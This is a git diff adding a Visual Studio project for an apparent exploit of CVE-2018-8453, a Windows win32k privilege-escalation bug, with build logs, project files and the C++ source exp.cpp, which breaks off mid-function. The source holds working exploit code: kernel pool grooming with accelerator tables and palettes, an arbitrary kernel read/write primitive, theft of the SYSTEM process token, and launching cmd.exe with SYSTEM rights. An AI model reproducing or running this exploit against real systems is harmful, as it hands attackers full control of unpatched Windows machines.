Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/ipch/EXP-7a579913/EXP-c8e60a99.ipch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/.vs/exp/v14/.suo b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/.vs/exp/v14/.suo
new file mode 100644
index 0000000..a834f37
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/.vs/exp/v14/.suo differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/Release/exp.exe b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/Release/exp.exe
new file mode 100644
index 0000000..1feac93
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/Release/exp.exe differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp.VC.db b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp.VC.db
new file mode 100644
index 0000000..f367b08
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp.VC.db differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp.sln b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp.sln
new file mode 100644
index 0000000..12f7ad4
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp.sln
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "exp", "exp\exp.vcxproj", "{28183B36-FF5A-4240-9BBC-60E767FADB82}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Debug|x64.ActiveCfg = Debug|x64
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Debug|x64.Build.0 = Debug|x64
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Debug|x86.ActiveCfg = Debug|Win32
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Debug|x86.Build.0 = Debug|Win32
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Release|x64.ActiveCfg = Release|x64
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Release|x64.Build.0 = Release|x64
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Release|x86.ActiveCfg = Release|Win32
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.Build.CppClean.log b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.Build.CppClean.log
new file mode 100644
index 0000000..317b5ab
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.Build.CppClean.log
@@ -0,0 +1,14 @@
+c:\users\ze0r\desktop\exp\exp\debug\exp.pch
+c:\users\ze0r\desktop\exp\exp\debug\vc140.pdb
+c:\users\ze0r\desktop\exp\exp\debug\vc140.idb
+c:\users\ze0r\desktop\exp\exp\debug\stdafx.obj
+c:\users\ze0r\desktop\exp\exp\debug\exp.obj
+c:\users\ze0r\desktop\exp\debug\exp.ilk
+c:\users\ze0r\desktop\exp\debug\exp.exe
+c:\users\ze0r\desktop\exp\debug\exp.pdb
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\cl.command.1.tlog
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\cl.read.1.tlog
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\cl.write.1.tlog
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\link.command.1.tlog
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\link.read.1.tlog
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\link.write.1.tlog
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.log b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.log
new file mode 100644
index 0000000..bb56673
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.log
@@ -0,0 +1,3 @@
+ exp.cpp
+ exp.vcxproj -> C:\Users\ze0r\Desktop\exp\Debug\exp.exe
+ exp.vcxproj -> C:\Users\ze0r\Desktop\exp\Debug\exp.pdb (Full PDB)
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.obj b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.obj
new file mode 100644
index 0000000..75ef03b
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.pch b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.pch
new file mode 100644
index 0000000..0bcf152
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.pch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/CL.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..5a7107a
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/CL.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/CL.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..02ec268
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/CL.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/CL.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..7714a95
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/CL.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/exp.lastbuildstate b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/exp.lastbuildstate
new file mode 100644
index 0000000..16a0349
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/exp.lastbuildstate
@@ -0,0 +1,2 @@
+#TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
+Debug|Win32|C:\Users\ze0r\Desktop\exp\|
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/link.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/link.command.1.tlog
new file mode 100644
index 0000000..3ac3afb
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/link.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/link.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/link.read.1.tlog
new file mode 100644
index 0000000..feae9a3
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/link.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/link.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/link.write.1.tlog
new file mode 100644
index 0000000..d8a9c0e
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/exp.tlog/link.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/stdafx.obj b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/stdafx.obj
new file mode 100644
index 0000000..8b0f3c4
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/stdafx.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/vc140.idb b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/vc140.idb
new file mode 100644
index 0000000..14a1e1c
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/vc140.idb differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/vc140.pdb b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/vc140.pdb
new file mode 100644
index 0000000..08c9762
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Debug/vc140.pdb differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/ReadMe.txt b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/ReadMe.txt
new file mode 100644
index 0000000..5b66131
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/ReadMe.txt
@@ -0,0 +1,30 @@
+========================================================================
+ 控制台应用程序:exp 项目概述
+========================================================================
+
+应用程序向导已为您创建了此 exp 应用程序。
+
+本文件概要介绍组成 exp 应用程序的每个文件的内容。
+
+
+exp.vcxproj
+ 这是使用应用程序向导生成的 VC++ 项目的主项目文件,其中包含生成该文件的 Visual C++ 的版本信息,以及有关使用应用程序向导选择的平台、配置和项目功能的信息。
+
+exp.vcxproj.filters
+ 这是使用“应用程序向导”生成的 VC++ 项目筛选器文件。它包含有关项目文件与筛选器之间的关联信息。在 IDE 中,通过这种关联,在特定节点下以分组形式显示具有相似扩展名的文件。例如,“.cpp”文件与“源文件”筛选器关联。
+
+exp.cpp
+ 这是主应用程序源文件。
+
+/////////////////////////////////////////////////////////////////////////////
+其他标准文件:
+
+StdAfx.h, StdAfx.cpp
+ 这些文件用于生成名为 exp.pch 的预编译头 (PCH) 文件和名为 StdAfx.obj 的预编译类型文件。
+
+/////////////////////////////////////////////////////////////////////////////
+其他注释:
+
+应用程序向导使用“TODO:”注释来指示应添加或自定义的源代码部分。
+
+/////////////////////////////////////////////////////////////////////////////
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.Build.CppClean.log b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.Build.CppClean.log
new file mode 100644
index 0000000..dfcdb2b
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.Build.CppClean.log
@@ -0,0 +1,14 @@
+c:\users\ze0r\desktop\exp\exp\release\exp.pch
+c:\users\ze0r\desktop\exp\exp\release\vc140.pdb
+c:\users\ze0r\desktop\exp\exp\release\stdafx.obj
+c:\users\ze0r\desktop\exp\exp\release\exp.obj
+c:\users\ze0r\desktop\exp\release\exp.exe
+c:\users\ze0r\desktop\exp\release\exp.ipdb
+c:\users\ze0r\desktop\exp\release\exp.iobj
+c:\users\ze0r\desktop\exp\release\exp.pdb
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\cl.command.1.tlog
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\cl.read.1.tlog
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\cl.write.1.tlog
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\link.command.1.tlog
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\link.read.1.tlog
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\link.write.1.tlog
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.log b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.log
new file mode 100644
index 0000000..319a91e
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.log
@@ -0,0 +1,8 @@
+ exp.cpp
+ 正在生成代码
+ 1 of 20 functions ( 5.0%) were compiled, the rest were copied from previous compilation.
+ 0 functions were new in current compilation
+ 3 functions had inline decision re-evaluated but remain unchanged
+ 已完成代码的生成
+ exp.vcxproj -> C:\Users\ze0r\Desktop\exp\Release\exp.exe
+ exp.vcxproj -> C:\Users\ze0r\Desktop\exp\Release\exp.pdb (Full PDB)
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.obj b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.obj
new file mode 100644
index 0000000..14c5143
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.pch b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.pch
new file mode 100644
index 0000000..e281b4d
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.pch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/CL.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..647b9d7
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/CL.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/CL.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..6d7ddf0
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/CL.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/CL.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..9d55f25
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/CL.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/exp.lastbuildstate b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/exp.lastbuildstate
new file mode 100644
index 0000000..63114d5
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/exp.lastbuildstate
@@ -0,0 +1,2 @@
+#TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
+Release|Win32|C:\Users\ze0r\Desktop\exp\|
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/link.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/link.command.1.tlog
new file mode 100644
index 0000000..f3e4814
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/link.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/link.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/link.read.1.tlog
new file mode 100644
index 0000000..903949e
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/link.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/link.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/link.write.1.tlog
new file mode 100644
index 0000000..b7c7941
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/exp.tlog/link.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/stdafx.obj b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/stdafx.obj
new file mode 100644
index 0000000..d800a72
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/stdafx.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/vc140.pdb b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/vc140.pdb
new file mode 100644
index 0000000..19fcad5
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/Release/vc140.pdb differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/exp.cpp b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/exp.cpp
new file mode 100644
index 0000000..6806763
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_webshell/exp/exp.cpp
@@ -0,0 +1,404 @@
+#include "stdio.h"
+#include "stdafx.h"
+#include "windows.h"
+#include "psapi.h"
+
+BOOL bMSGSENT = FALSE;
+HWND hMainWND;
+HWND hSBWND;
+HWND hSBWNDnew;
+DWORD SystemCallStub;
+CHAR flag[0x80] = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ze0r is so cool!";
+
+HPALETTE hManager;
+HPALETTE hWorker;
+HPALETTE hKeep;
+HDC hKeepDC = NULL;
+PDWORD CallbackTb = 0;
+LPACCEL lpAccel;
+
+typedef VOID(WINAPI * fct_fnDispatch)(PDWORD msg);
+
+fct_fnDispatch fnDWORD;
+fct_fnDispatch fnClientFreeWindowClassExtraBytes;
+
+typedef struct
+{
+ DWORD UniqueProcessIdOffset;
+ DWORD TokenOffset;
+} VersionSpecificConfig;
+
+VersionSpecificConfig gConfig = { 0xb4, 0xfc }; // Win 10 15063 rs2 x86
+
+LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
+INT_PTR CALLBACK About(HWND, UINT, WPARAM, LPARAM);
+
+void SetWindowFNID(HWND hWnd, DWORD FNID) {
+ __asm {
+ mov esi, esi;
+ mov eax, hWnd;
+ push FNID;
+ push eax;
+ push 0;
+ mov eax, 0x1202;
+ mov edx, SystemCallStub;
+ call edx;
+ add esp, 0x0c;
+ }
+}
+
+int SetLinkedUFIs(HDC hdc, int len) {
+ int retvalue;
+ __asm {
+ push len;
+ lea eax, flag;
+ PUSH eax;
+ push hdc;
+ push 0;
+ mov eax, 0x1023;
+ mov edx, SystemCallStub;
+ call edx;
+ add esp, 0x10;
+ mov retvalue, eax;
+ }
+ return retvalue;
+}
+
+DWORD buf[0x240];
+
+void ReadMem(DWORD Addr, DWORD len) {
+ memset(buf, 0, 0x240 * 4);
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ buf[19] = Addr;
+ SetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ GetPaletteEntries(hWorker, 0, len, (LPPALETTEENTRY)buf);
+}
+
+ULONG GetNTOsBase()
+{
+ ULONG Bases[0x1000];
+ DWORD needed = 0;
+ ULONG krnlbase = 0;
+ if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) {
+ krnlbase = Bases[0];
+ }
+ return krnlbase;
+}
+
+DWORD_PTR PsInitialSystemProcess(VOID)
+{
+ ULONG Module = (ULONG)LoadLibraryA("ntoskrnl.exe");
+ ULONG Addr = (ULONG)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess");
+ FreeLibrary((HMODULE)Module);
+ ULONG res = 0;
+ ULONG ntOsBase = GetNTOsBase();
+ if (ntOsBase) {
+ ReadMem(Addr - Module + ntOsBase, 16);
+ res = buf[0];
+ }
+ return res;
+}
+
+ULONG PsGetCurrentProcess(DWORD sysEPS)
+{
+ ULONG pEPROCESS = sysEPS;
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG), 16);
+ while (TRUE) {
+ pEPROCESS = buf[1] - gConfig.UniqueProcessIdOffset - sizeof(ULONG);
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset, 16);
+ if (GetCurrentProcessId() == buf[0]) {
+ return pEPROCESS;
+ }
+ }
+}
+
+DWORD_PTR GetKernelHandleTable(VOID)
+{
+ ULONG Module = (ULONG)LoadLibraryA("ntoskrnl.exe");
+ ULONG Addr = (ULONG)GetProcAddress((HMODULE)Module, "KeServiceDescriptorTable");
+ FreeLibrary((HMODULE)Module);
+ ULONG res = 0;
+ ULONG DestroyAcceleratorTableAddr = 0;
+ ULONG HMValidateHandleAddr = 0;
+ ULONG ntOsBase = GetNTOsBase();
+ if (ntOsBase) {
+ //��ȻKeServiceDescriptorTableShadowδ����������λ��KeServiceDescriptorTable - 0x40�ĵط���
+ ReadMem(Addr - Module + ntOsBase - 0x40, 16 * 6);
+ //��ȡwin32k!NtUserDestroyAcceleratorTable������ַ
+ ReadMem(buf[4] + 0x500, 16);
+ ReadMem(buf[0] + 2, 16);
+ //��ȡwin32kfull!NtUserDestroyAcceleratorTable
+ ReadMem(buf[0], 16);
+ DestroyAcceleratorTableAddr = buf[0] + 0x18;
+ //��ȡwin32kfull!HMValidateHandle
+ ReadMem(DestroyAcceleratorTableAddr, 16);
+ //�ҵ�gpKernelHandleTable
+ HMValidateHandleAddr = DestroyAcceleratorTableAddr + buf[0] + 4 + 0x39;
+ ReadMem(HMValidateHandleAddr, 16);
+ ReadMem(buf[0], 16);
+ ReadMem(buf[0], 16);
+ res = buf[0];
+ }
+ return res;
+}
+
+HPALETTE CreatePaletteOfSize(int size, DWORD value) {
+ int pal_cnt = (size - 0x60) / 4;
+ int palsize = sizeof(LOGPALETTE) + (pal_cnt - 1) * sizeof(PALETTEENTRY);
+ LOGPALETTE *lPalette = (LOGPALETTE*)malloc(palsize);
+ memset(lPalette, value, palsize);
+ lPalette->palNumEntries = pal_cnt;
+ lPalette->palVersion = 0x300;
+ return CreatePalette(lPalette);
+}
+
+
+HACCEL hAccel_0xC10_top[2000];
+HACCEL hAccel_0x50_middle[3000];
+HACCEL hAccel_0x3B0_bottom[2000];
+HACCEL hAccel_ReusePalette[8000];
+HDC hDC_Writer[3000];
+HPALETTE hPalettes[10000];
+
+void BeforSBTrackAlloc() {
+
+ for (int i = 0; i < 3000; i++) {
+ hDC_Writer[i] = CreateCompatibleDC(NULL);
+ }
+
+ for (int i = 0; i < 2000; i++) {
+ hAccel_0xC10_top[i] = CreateAcceleratorTableW(lpAccel, 0x1FD);
+ }
+
+ for (int i = 0; i < 2000; i++) {
+ hAccel_0x3B0_bottom[i] = CreateAcceleratorTableW(lpAccel, 0x95);
+ }
+
+ for (int i = 0; i < 3000; i++) {
+ hAccel_0x50_middle[i] = CreateAcceleratorTableW(lpAccel, 8);
+ }
+ for (int i = 1000; i < 3000; i += 2) {
+ DestroyAcceleratorTable(hAccel_0x50_middle[i]);
+ }
+}
+
+void _cdecl AfterSBTrackAlloc() {
+ for (int i = 0; i < 3000; i++) {
+ DestroyAcceleratorTable(hAccel_0x50_middle[i]);
+ }
+ //������Ϣ,ϵͳ�ͷ�SBTrack;
+ SendMessage(hSBWNDnew, WM_CANCELMODE, 0, 0);
+ //�ͷ�0x3a0��ռ�ÿռ�,��0x3a0�������SBTrack(size=0x50)�ϲ�Ϊ0x3f0��С;
+ for (int i = 0; i < 2000; i++) {
+ DestroyAcceleratorTable(hAccel_0x3B0_bottom[i]);
+ }
+
+ for (int i = 0; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i], 0x7D);
+ }
+}
+
+void FindManagerAndWorker() {
+
+ for (int i = 0; i < 2000; i++) {
+ DestroyAcceleratorTable(hAccel_0xC10_top[i]);
+ }
+ for (int i = 0; i < 3000; i++) {
+ hPalettes[i] = CreatePaletteOfSize(0xb30, 0x66);
+ }
+ for (int i = 0; i < 2000; i++) {
+ hAccel_0x50_middle[i] = CreateAcceleratorTableW(lpAccel, 0x26);
+ }
+ for (int i = 3000; i < 10000; i++) {
+ hPalettes[i] = CreatePaletteOfSize(0x100, 0x88);
+ }
+
+ *((DWORD *)flag) = 0x501;
+ *((DWORD *)flag + 1) = 0xFFFF;
+ for (int i = 0; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i], 1);
+ }
+ memset(buf, 0, 0x240 * 4);
+ for (int i = 3000; i < 10000; i++) {
+ if (GetPaletteEntries(hPalettes[i], 0x2B, 80, (LPPALETTEENTRY)buf)) {
+ hKeep = hPalettes[i];
+ hManager = (HPALETTE)*buf;
+ hWorker = (HPALETTE)*(buf + 64);
+ *(buf + 5) = 0xFFFF;
+ *(buf + 69) = 0xFFFF;
+ SetPaletteEntries(hPalettes[i], 0x2B, 80, (LPPALETTEENTRY)buf);
+ }
+ }
+
+ *((DWORD *)flag) = 0x501;
+ *((DWORD *)flag + 1) = 0x28;
+ for (int i = 0; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i], 1);
+ if (!hKeepDC && (!GetPaletteEntries(hKeep, 0x2B, 80, (LPPALETTEENTRY)buf))) {
+ hKeepDC = hDC_Writer[i];
+ }
+ }
+}
+
+void GetSystem() {
+
+ ULONG SelfToken = 0;
+ ULONG SystemToken = 0;
+ DWORD ACCELHandle = 0;
+ DWORD SystemEPS;
+ DWORD CurrentEPS;
+ DWORD pKernelHandleTable;
+
+ STARTUPINFO stStartUpInfo = { sizeof(stStartUpInfo) };
+ PROCESS_INFORMATION pProcessInfo;
+ WCHAR cmd[] = L"c:\\\\windows\\\\system32\\\\cmd.exe";
+
+ printf("[*] Find Manager and Worker.\n");
+ FindManagerAndWorker();
+ SystemEPS = PsInitialSystemProcess();
+ CurrentEPS = PsGetCurrentProcess(SystemEPS);
+ pKernelHandleTable = GetKernelHandleTable();
+
+ ReadMem(SystemEPS + gConfig.TokenOffset, 16);
+ SystemToken = buf[0];
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ buf[19] = CurrentEPS + gConfig.TokenOffset;
+ SetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+
+ GetPaletteEntries(hWorker, 0, 1, (LPPALETTEENTRY)&SelfToken);
+ SetPaletteEntries(hWorker, 0, 1, (LPPALETTEENTRY)&SystemToken);
+
+ Sleep(500);
+ printf("[*] Swaping shell.\n\n");
+ ZeroMemory(&stStartUpInfo, sizeof(STARTUPINFO));
+ stStartUpInfo.cb = sizeof(STARTUPINFO);
+ stStartUpInfo.dwFlags = STARTF_USESHOWWINDOW;
+ stStartUpInfo.wShowWindow = 1;
+ CreateProcess(cmd, NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &stStartUpInfo, &pProcessInfo);
+ Sleep(1000);
+ SetPaletteEntries(hWorker, 0, 1, (LPPALETTEENTRY)&SelfToken);
+
+ for (int i = 3000; i < 10000; i++) {
+ if ((hPalettes[i] != hManager) && (hPalettes[i] != hWorker)) {
+ DeleteObject(hPalettes[i]);
+ }
+ }
+ for (int i = 0; i < 8000; i++) {
+ hAccel_ReusePalette[i] = CreateAcceleratorTableW(lpAccel, 0x22);
+ }
+
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ ReadMem(buf[20] - 0x1f0, 16);
+ ACCELHandle = buf[0];
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ buf[19] = pKernelHandleTable + (ACCELHandle & 0xffff) * 8;
+ SetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+
+ DeleteDC(hKeepDC);
+
+ buf[0] = 0;
+ buf[1] = 0;
+ SetPaletteEntries(hWorker, 0, 2, (LPPALETTEENTRY)buf);
+}
+
+void fnDWORDCallBack(PDWORD msg) {
+
+ if (bMSGSENT && *msg) {
+ bMSGSENT = FALSE;
+ printf("[*] Destroy Window.\n");
+ DestroyWindow(hMainWND);
+ }
+
+ if (*msg && (*(msg + 1) == 0x70) && (*((DWORD*)(*msg)) == (DWORD)hMainWND)) {
+ printf("[*] ReAlloc Memory.\n");
+ _asm pushad;
+ AfterSBTrackAlloc();
+ _asm popad;
+ }
+ fnDWORD(msg);
+}
+
+void fnClientFreeWindowClassExtraBytesCallBack(PDWORD msg) {
+
+ if ((HWND)*(msg + 3) == hMainWND) {
